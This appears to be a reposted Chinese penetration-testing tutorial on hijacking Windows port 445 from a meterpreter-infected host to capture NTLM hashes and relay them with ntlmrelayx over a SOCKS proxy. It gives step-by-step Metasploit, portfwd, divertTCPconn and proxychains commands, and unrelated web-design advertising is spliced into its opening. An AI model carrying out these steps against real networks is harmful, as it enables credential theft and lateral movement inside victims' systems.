今天就跟大家聊聊有關如何理解Meterpreter在Windows 445端口實施遠程NTLM中繼攻擊測試,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
為濱城等地區(qū)用戶提供了全套網頁設計制作服務,及濱城網站建設行業(yè)解決方案。主營業(yè)務為網站制作、網站建設、濱城網站設計,以傳統(tǒng)方式定制建設網站,并提供域名空間備案等一條龍服務,秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務。我們深信只要達到每一位用戶的要求,就會得到認可,從而選擇與我們長期合作。這樣,我們也可以走得更遠!
劫持445端口來執(zhí)行中繼攻擊或Hash-Capturing攻擊已經是一種經常會出現的攻擊方式了,當你使用meterpreter感染目標設備時,你如何監(jiān)聽445端口呢?就在幾周之前,這個話題再次浮出了水面。但實際上,現有的工具早就已經解決了這個問題了,只不過很少有人知道罷了…
我們將介紹如何利用這些工具來對目標設備執(zhí)行中繼攻擊。這種技術的好處就在于,我們不需要在受感染的主機上使用python2exe或整個Python棧,我們只需要使用簡單的驅動器和meterpreter就可以實現目標。
請注意,為了方便演示,我們這里把所有的文件都放在了目標主機的磁盤中,如果你在實際操作中不想這樣的話,你可以使用RAM磁盤解決方案或擴展當前的meterpreter內存執(zhí)行功能來實現自己的目標。除此之外,你還可以采用靜態(tài)編譯等方法來捆綁額外的DLL文件。
首先,我們需要知道主機中哪一個服務或進程負責監(jiān)聽端口445。一般來說,在解決這種類型的問題時我喜歡先上網搜索一番,如果有人已經回答過這些問題的話,我們就可以直接在系統(tǒng)上手動驗證并復制解決方案了。所以我直接Google了以下內容:
msdnprocess listening port 445
我進行了一系列測試,并通過啟用和禁用服務來判斷該服務是否負責監(jiān)聽445端口,結果我就發(fā)現了Server服務。但是這個服務并不會給我們帶來立竿見影的效果,因為它需要重啟設備才能完成我們的操作,顯然這不是真正可行的解決方案。因為理想情況下,我們并不想重啟受感染的設備。
深入分析并查看該服務的相關屬性之后,我們就可以找到啟用該服務的命令:
C:\WINDOWS\system32\svchost.exe-k netsvcs -p
如果你想深入了解svchost.exe的命令行參數,我建議你訪問Geoff Chappell的網站:【傳送門】
如果我們導航到文章上述所介紹的注冊表鍵:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost
我們將看到大量的捆綁服務,但這也并沒有完全解決我們的問題,所以我們需要另辟蹊徑。這里我找到了一篇關于EternalBlue漏洞利用的文章,這里面提到了漏洞利用分析和Windows 10端口的相關內容:srv.sys驅動器和某些需要與該驅動器協同工作的驅動器都會涉及到SMB協議。最后,為了得到最終的確認,我們還找到了這篇文章:【 傳送門】
現在,我們了解到了負責處理程序與端口445通信的代碼位于內核中,這對于我們來說絕對是一個壞消息,因為劫持socket的難度非常大。接下來,我們會介紹如何劫持和重定向端口445。
既然我們已經知道了端口445的“主人”存在于內核中,我們就可以開始設計我們的攻擊策略了。首先,我想到的就是使用Linux的iptables來劫持傳入或傳出的連接數據,因為它所做的工作屬于的是網絡棧中的底層部分。為了弄清楚這種方法能否應用到Windows中,我們需要看一看Windows防火墻的內部工作原理:
1、 Windows防火墻架構:【傳送門】
2、 Windows過濾器平臺概覽:【傳送門】
這里我們需要創(chuàng)建一個專門的驅動程序,你可能會認為netsh端口重定向技術可能會有用,但其實不然。雖然創(chuàng)建一個驅動程序聽起來似乎并不是最理想的解決方案,但如果你搜索類似wfp端口連接之類的相關內容,你就會發(fā)現答案@agsolino已經給出了,接下來我們一起看一看如何利用meterpreter和上述技術來重定向目標系統(tǒng)端口445的連接。下圖顯示的是整個技術的工作機制:
我們可以看到,我們已經得到了一臺感染了meterpreter的主機,利用這個meterpreter,我們可以設置一個反向端口轉發(fā),然后在我們的主機上通過端口4444來接收meterpreter連接。遠程監(jiān)聽端口8445(meterpreter)將接收來自端口445的連接數據,從而劫持來自445的連接,并將它們轉發(fā)到metasploit。接下來,我們通過劫持某些憑證來看看如何劫持Windows 445端口:
1. 設置一個可用的擁有管理員權限的meterpreter會話;
2. 設置一個SMB捕捉服務器:
a) 使用auxiliary/scanner/smb/smb_login
b) 設置SRVPORT 9445
c) 運行-j
3. 設置一個meterpreter反向轉發(fā)端口:
portfwdadd -R -L 127.0.0.1 -l 9445 -p 8445
4. 設置端口445劫持:
divert TCPConn.exe 445 8445
現在,當目標主機連接到受感染主機的445端口之后,你將會在你的metasploit控制臺中接收到哈希:
接下來,我們一起看一看遠程NTLM中繼攻擊的完整實現機制。
現在,我們將在Ubuntu系統(tǒng)中使用ntlmrelayx,中繼設備為目標系統(tǒng)中的某個系統(tǒng)。這里涉及到通過meterpreter來轉發(fā)正向和反向流量,反向連接用于確保目標網絡內的主機能夠跟受感染主機完成連接,這里需要用到ntlmrelayx,與目標網絡的連接需要涉及到SOCKS代理。下圖顯示的是整個攻擊流程:
第一步跟之前的圖片類似,這里將設置我們的反向信道:
1. 設置一個可用的擁有管理員權限的meterpreter會話
2. 設置一個meterpreter反向端口轉發(fā):
portfwd add -R -p 4445 -l 445 -L 127.0.0.1
3. 通過meterpreter進行端口445劫持:
execute-f divertTCPconn.exe -a '445 4445'
為了設置轉發(fā)信道,我們通過meterpreter會話聽加了一個路由來重定向流量,并設置SOCKS代理:
1. 通過meterpreter添加路由,這里需要指定IP地址:
route add 192.168.222.103/32 3
2. 設置SOCKS代理:
a) 使用auxiliary/server/socks4a
b) run
c) 確保/etc/proxychains.conf中指定了SOCKS端口(默認1080)
3. 通過SOCK運行ntlmrelayx:
sudo proxychains ntlmrelayx.py -t smb://192.168.222.103 -smb2support
下圖為運行結果:
看完上述內容,你們對如何理解Meterpreter在Windows 445端口實施遠程NTLM中繼攻擊測試有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注創(chuàng)新互聯行業(yè)資訊頻道,感謝大家的支持。
本文名稱:如何理解Meterpreter在Windows445端口實施遠程NTLM中繼攻擊測試
本文路徑:http://www.rwnh.cn/article42/ippdec.html
成都網站建設公司_創(chuàng)新互聯,為您提供App設計、網站改版、全網營銷推廣、網站收錄、外貿網站建設、微信公眾號
聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯